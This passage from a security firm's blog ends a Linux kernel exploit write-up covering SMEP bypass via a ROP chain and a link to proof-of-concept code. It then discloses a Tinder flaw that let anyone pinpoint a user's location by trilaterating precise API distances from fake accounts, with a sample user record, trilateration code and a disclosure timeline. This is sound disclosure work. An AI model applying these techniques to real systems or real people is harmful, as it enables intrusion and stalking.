In this case a non-threaded exploit which clears the bytes sequentially can be used. You'd want to wait 255 seconds for each byte, which guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes three times as long as the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).

In theory, the original non-threaded version of this exploit is more reliable than the threaded version, but it takes longer to execute.

Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as a kind of DEP/NX for the kernel. To bypass SMEP, bit 20 of CR4 can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register, exploitation would still be possible by writing the payload entirely in ROP.
Also see the post in [9].

That's it, find the full proof-of-concept exploit code at:
https://github.com/saelo/cve-2014-0038

If you have interesting optimizations or alternative implementations let us know via email info/at\includesecurity.com

References

[1] http://seclists.org/oss-sec/2014/q1/187
[2] http://en.wikipedia.org/wiki/x32_ABI
[3] http://www.phrack.org/issues.html?id=6&issue=64
[4] http://grsecurity.net/~spender/exploits/enlightenment.tgz
[5] http://packetstormsecurity.com/files/121616/semtex.c
[6] http://pastebin.com/DH3Lbg54
[7] http://en.wikipedia.org/wiki/Control_register#CR4
[8] http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
[9] http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux

Wednesday, February 19, 2014

How I was able to track the location of any Tinder user.

By Max Veytsman
At IncludeSec we specialize in application security assessment for our clients. That means taking applications apart and finding really crazy vulnerabilities before other hackers do. When we have time off from client work we like to analyze popular apps to see what we find. Towards the end of 2013 we found a vulnerability that lets you get exact latitude and longitude co-ordinates for any Tinder user (which has since been fixed).

Tinder is an incredibly popular dating app. It presents the user with photographs of strangers and allows them to "like" or "nope" them. When two people "like" each other, a chat box pops up allowing them to talk. What could be simpler?

Being a dating app, it's important that Tinder shows you attractive singles in your area. To that end, Tinder tells you how far away potential matches are:


Before we continue, a bit of history: In July 2013, a different privacy vulnerability was reported in Tinder by another security researcher. At the time, Tinder was actually sending latitude and longitude co-ordinates of potential matches to the iOS client. Anyone with rudimentary programming skills could query the Tinder API directly and pull down the co-ordinates of any user.
I'm going to talk about a different vulnerability that's related to how the one described above was fixed. In implementing their fix, Tinder introduced a new vulnerability that's described below.

The API

By proxying iPhone requests, it's possible to get a picture of the API the Tinder app uses. Of interest to us today is the user endpoint, which returns details about a user by id. This is called by the client for your potential matches as you swipe through pictures in the app.
Here's a snippet of the response:
{
   "status":200,
   "results":{
      "bio":"",
      "name":"Anthony",
      "birth_date":"1981-03-16T00:00:00.000Z",
      "gender":0,
      "ping_time":"2013-10-18T18:31:05.695Z",
      "photos":[
      //cut to save space
      ],
      "id":"52617e698525596018001418",
      "common_friends":[

      ],
      "common_likes":[

      ],
      "common_like_count":0,
      "common_friend_count":0,
      "distance_mi":4.760408451724539
   }
}
Tinder is no longer returning exact GPS co-ordinates for its users, but it is leaking some location information that an attacker can exploit. The distance_mi field is a 64-bit double. That's a lot of precision that we're getting, and it's enough to do really accurate triangulation!

Triangulation

As far as high-school subjects go, trigonometry isn't the most popular, so I won't go into too many details here. Basically, if you have three (or more) distance measurements to a target from known locations, you can get an absolute location of the target using triangulation¹. This is similar in principle to how GPS and cellphone location services work.

I can create a profile on Tinder, use the API to tell Tinder that I'm at some arbitrary location, and query the API to find a distance to a user. When I know the city my target lives in, I create 3 fake accounts on Tinder. I then tell the Tinder API that I am at three locations around where I guess my target is. Then I can plug the distances into the formula on this Wikipedia page.
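
For readers who want to see the arithmetic, here is a minimal sketch of the underlying calculation on a flat plane. It is not the TinderFinder code: the struct and function names are invented for this example, and it assumes the three known positions and the distances have already been converted to planar x/y units. Working with real latitude/longitude would need a projection step that is left out here. Subtracting the three circle equations pairwise leaves two linear equations in x and y, which are solved with Cramer's rule.

```c
#include <assert.h>
#include <stddef.h>

struct point {
    double x;
    double y;
};

/*
 * Planar trilateration: given three known points and the distance from
 * each of them to an unknown target, solve for the target position.
 * Returns 0 on success, -1 if the three known points are collinear.
 */
int trilaterate(struct point p1, double r1,
                struct point p2, double r2,
                struct point p3, double r3,
                struct point *out)
{
    /* circle 1 minus circle 2: a*x + b*y = c */
    double a = 2.0 * (p2.x - p1.x);
    double b = 2.0 * (p2.y - p1.y);
    double c = r1 * r1 - r2 * r2 - p1.x * p1.x + p2.x * p2.x
                                 - p1.y * p1.y + p2.y * p2.y;
    /* circle 2 minus circle 3: d*x + e*y = f */
    double d = 2.0 * (p3.x - p2.x);
    double e = 2.0 * (p3.y - p2.y);
    double f = r2 * r2 - r3 * r3 - p2.x * p2.x + p3.x * p3.x
                                 - p2.y * p2.y + p3.y * p3.y;
    double det = a * e - b * d;

    assert(out != NULL);
    if (det == 0.0)
        return -1;
    out->x = (c * e - f * b) / det;
    out->y = (a * f - c * d) / det;
    return 0;
}
```

As a quick check, known points at (4, 6), (-4, 14) and (9, 17) with distances 5, 13 and 17 place the target at (1, 2). With measured distances that carry some error, a least-squares fit over more than three points would be a more robust choice than this exact solve.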

To make this a bit clearer, I built a webapp....

TinderFinder

Before I go on, this app isn't online and we have no plans on releasing it. This is a serious vulnerability, and we in no way want to help people invade the privacy of others. TinderFinder was built to demonstrate a vulnerability and only tested on Tinder accounts that I had control of.
TinderFinder works by having you input the user id of a target (or use your own by logging into Tinder). The assumption is that an attacker can find user ids fairly easily by sniffing the phone's traffic to find them.
First, the user calibrates the search to a city. I'm picking a point in Toronto, because I will be finding myself.
I can locate the office I sat in while writing the app:
I can also enter a user-id directly:
And find a target Tinder user in NYC
You can find a video showing how the app works in more detail below:

FAQ

Q: What does this vulnerability allow one to do?
A: This vulnerability allows any Tinder user to find the exact location of another Tinder user with a very high degree of accuracy (within 100ft in our experiments).
Q: Is this type of flaw specific to Tinder?
A: Absolutely not. Flaws in location information handling have been commonplace in the mobile app space and will remain common if developers don't handle location information more sensitively.
Q: Does this give you the location of a user's last sign-in or when they signed up? or is it real-time location tracking?
A: This vulnerability finds the last location the user reported to Tinder, which usually happens when they last had the app open.
Q: Do you need Facebook for this attack to work?
A: While our proof-of-concept attack uses Facebook authentication to find the user's Tinder id, Facebook is NOT needed to exploit this vulnerability, and no action by Facebook could mitigate this vulnerability.
Q: Is this related to the vulnerability found in Tinder earlier this year?
A: Yes, this is related to the same area in which a similar privacy vulnerability was found in July 2013. The application architecture change Tinder made at the time to correct that vulnerability was not sufficient: they changed the JSON data from exact lat/long to a highly precise distance. Max and Erik from Include Security were able to extract precise location data from this using triangulation.
Q: How did Include Security notify Tinder and what recommendation was given?
A: We have not done research to find out how long this flaw has existed, we believe it is possible this flaw has existed since the fix was made for the previous privacy flaw in July 2013. The team's recommendation for remediation is to never deal with high resolution measurements of distance or location in any sense on the client-side. These calculations should be done on the server-side to avoid the possibility of the client applications intercepting the positional information. Alternatively using low-precision position/distance indicators would allow the feature and application architecture to remain intact while removing the ability to narrow down an exact position of another user.
Q: Is anybody exploiting this? How can I know if somebody has tracked me using this privacy vulnerability?
A: The API calls used in this proof-of-concept demonstration are not special in any way. They do not attack Tinder's servers and they use data which the Tinder web services export intentionally. There is no simple way to determine if this attack was used against a specific Tinder user.

Vulnerability Disclosure Timeline

  • October 23rd 2013 - We notified Tinder via email to customer service.
  • October 24th 2013 - We notified Tinder via email to CEO.
  • October 24th 2013 - Tinder's CEO acknowledges and says thanks.
  • November 8th 2013 - We ask for status from the CEO, no response.
  • December 2nd 2013 - We ask for status from the CEO, we're redirected to a tech team lead.
  • December 2nd 2013 - Tech team lead asks for more time to implement a fix, we acknowledge and agree.
  • January 1st 2014 - We look at the server-side traffic to see if the same issue exists and see that the high precision data is no longer being returned by the server (awesome looks like a fix!)
  • January 2nd 2014 - We ask for fix details/status from the tech team lead, no response.
  • February 4th 2014 - We ask for fix details/status from the tech team lead, no response.
  • February 7th 2014 - We ask for fix details/status from the CEO, get short reply saying they'll get back to us.
  • February 19th 2014 - As the issue does not seem to be reproducible and we have no updates from the vendor....blog post published.

  1. Technically we're doing trilateration. Triangulation involves finding distances when you have angle measurements, but it's used colloquially to mean trilateration as well. If you're so inclined, you can find out more about trilateration here